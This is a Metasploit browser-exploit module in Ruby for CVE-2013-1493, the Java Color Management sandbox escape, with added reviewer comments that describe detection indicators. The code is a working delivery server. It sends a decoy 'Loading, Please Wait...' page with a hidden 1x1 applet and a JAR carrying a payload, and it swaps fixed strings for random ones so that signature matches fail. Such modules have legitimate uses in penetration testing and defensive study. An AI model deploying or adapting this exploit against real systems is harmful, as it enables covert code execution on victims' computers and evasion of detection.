##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
require 'rex'
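# Metasploit browser-exploit module for CVE-2013-1493 (Java Color Management
# classes, code execution outside the applet sandbox).
#
# The Ruby below is only the delivery side: an HTTP server that hands out a
# landing page and a JAR. The vulnerability trigger lives in the precompiled
# class files that #setup reads from the framework's data directory; they are
# not part of this file.
#
# Reviewer notes for detection and response, all taken from the code below:
# * Affected range per the module description: Java 7u15 and earlier and 6u41
#   and earlier. Click-to-play is not bypassed, so the Java warning is shown
#   and must be accepted before the applet runs.
# * Landing page: a request whose URI ends in "/" gets HTML titled
#   "Loading, Please Wait..." holding a 1x1 <applet> whose archive is a random
#   8-letter name ending in ".jar".
# * JAR response: sent as application/octet-stream for any URI ending in
#   ".jar" (case-insensitive). It carries the fixed entry names Leak.class,
#   MyBufferedImage.class and MyColorSpace.class plus one random four-letter
#   class name, so a signature on "Init.class" alone will not match.
# * The strings "metasploit" and "Payload" are replaced with random letters in
#   every JAR entry name and body before the manifest is built.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  # NOTE(review): going by the option name, this tells BrowserAutopwn the
  # module does not depend on JavaScript; confirm against the mixin.
  autopwn_info({ :javascript => false })

  # Registers the module metadata (name, description, references, payload
  # constraints, targets) with the framework.
  #
  # @param info [Hash] metadata supplied by the caller; merged via update_info
  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      # Index 1 selects the 'Windows x86 (Native Payload)' entry above.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Reads the four precompiled class files from
  # <install_root>/data/exploits/cve-2013-1493/ into memory (binary mode) and
  # picks a random name for the entry class before handing over to the
  # framework's own setup.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # The replacement has the same length as "Init"; presumably this keeps the
    # length fields inside the compiled class file valid (confirm). Only the
    # Init class is renamed; the other three keep their names.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  # HTTP request handler. Dispatches on the request URI:
  # * ends in ".jar" (case-insensitive): build and send the JAR
  # * ends in "/": send the applet landing page
  # * anything else: redirect to the resource path with a trailing "/"
  #
  # @param cli client connection object passed in by the HTTP server mixin
  # @param request the incoming request; only request.uri is read here
  def on_request_uri(cli, request)
    # Every handled URI is written to the module's status output.
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Same-length random replacements for two fixed strings, applied to both
      # the entry names and the entry bodies, so plain string matches on
      # "metasploit" or "Payload" in the served JAR will not hit.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      # Rebuilt after the renames above.
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a "Loading, Please Wait..." document with a
  # single 1x1 <applet> element. The archive name is a fresh random 8-letter
  # string per call; the code attribute is the class name chosen in #setup.
  #
  # @return [String] the HTML document
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end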